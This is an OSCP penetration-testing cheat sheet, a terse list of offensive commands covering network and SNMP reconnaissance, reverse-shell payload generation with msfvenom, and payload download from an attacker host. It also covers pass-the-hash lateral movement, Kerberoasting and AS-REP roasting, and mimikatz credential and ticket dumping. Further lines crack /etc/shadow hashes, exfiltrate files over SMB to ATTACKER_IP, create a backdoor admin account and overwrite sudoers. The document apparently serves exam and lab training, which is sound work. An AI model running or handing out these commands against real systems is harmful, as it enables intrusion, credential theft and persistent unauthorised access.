oscp cheatsheet 🥷

Blackbox reconnaissance

nmap -iL hosts.txt -p- -sVC -T5

sudo nmap <host> -sU -F


onesixtyone <TARGET> -c /usr/share/wordlists/snmp.txt
snmpwalk -v 1 -c public  <TARGET> NET-SNMP-EXTEND-MIB::nsExtendObjects
snmpwalk -v1 -c public <TARGET> .1.3.6.1.4.1.8072.1.3.2

ldapsearch -x -H ldap://<TARGET> -s base namingcontexts

mssqlclient.py user:passwd@IP -windows-auth
wget -m <TARGET>/.git/ -R "index.html*"

RCE

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=<YOUR_PORT> -f exe -o shell.exe
powershell.exe -c "whoami;shell2.exe"
iwr http://<HOST>:<PORT>/shell.exe -O shell.exe
iwr http://<HOST>:<PORT>/shell.exe -O shell.exe -UseBasicParsing

certutil -urlcache -split -f http://HOST:PORT/tool.exe tool.exe

Lateral movement

psexec.py  <domain>/<user>:<password>@<IP> -hashes ":<NT hash>"
psexec.py <domain>/<user>:<password>@<IP>

evil-winrm -i <TARGET> -u <USER> -p <PASSWORD>

Machine/account reconnaissance

whoami /user

netstat -ano | findstr LISTENING

tree /f /a
dir /s /a:h
dir C:\

whoami /priv
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

BloodHound collection:

bloodhound-ce-python -u <USER> -p <PASSWORD> -dc DC01.<DOMAIN> --dns-tcp -ns <DC_IP> -d <DOMAIN> --zip
powershell -ep bypass
Import-Module .\Sharphound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\user\Desktop\ -OutputPrefix "export"

Kerberoast (auth)

nxc ldap <TARGETS> -u <USER> -p <PASSWORD> --kerberoast hashes.kerberoast

hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule     

ASREPRoast:

# Unauthenticated
nxc ldap <TARGETS> -u users.txt -p '' --asreproast output.txt

# Authenticated
nxc ldap <TARGETS> -u <USER>  -p <PASSWORD> --asreproast hashes.asreproast

nxc ldap <TARGETS> -u <USER>  -p <PASSWORD> --asreproast hashes.asreproast --kdcHost domain_name

hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule 

SAM:

C:\Windows\System32\config\SAM
icacls SAM
secretsdump.py -sam SAM -system SYSTEM LOCAL -outputfile secrets

Admin

LSASS Dumping (admin):

mimikatz
$ privilege::debug
$ sekurlsa::logonpasswords

TGT Dumping (admin):

mimikatz
$ privilege::debug
$ sekurlsa::tickets /export

Compress-Archive -Path *.kirbi -DestinationPath tickets.zip

Crack NT-hash:

hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

Crack netNTLM challenge response:

hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

-> dcsync

-> when spreading with nxc --local-auth for local admin

awk -F: '$2 ~ /^\$/ {print $1":"$2}' /etc/shadow > hashes.txt
hashcat -m 1800 hashes.txt rockyou.txt --username

Misc

Exfiltration SMB:

smbserver.py myshare . -smb2support
copy C:\path\to\file.txt \\ATTACKER_IP\share\

Create local admin for RDP access:

net user <USERNAME> <PASSWORD> /add
net localgroup administrators <USERNAME> /add

Linux privesc

uname -a
cat /etc/os-release

crontab -l

find / -perm -u=s -type f 2>/dev/null
sudo -l


su username
sudo su

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf -o shell.elf


# from root file write
echo 'kali ALL=(root) NOPASSWD: ALL' > /etc/sudoers

https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

# Within reverse shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color

# Then CTRL+Z

# Then locally
stty raw -echo
fg


# To reset
reset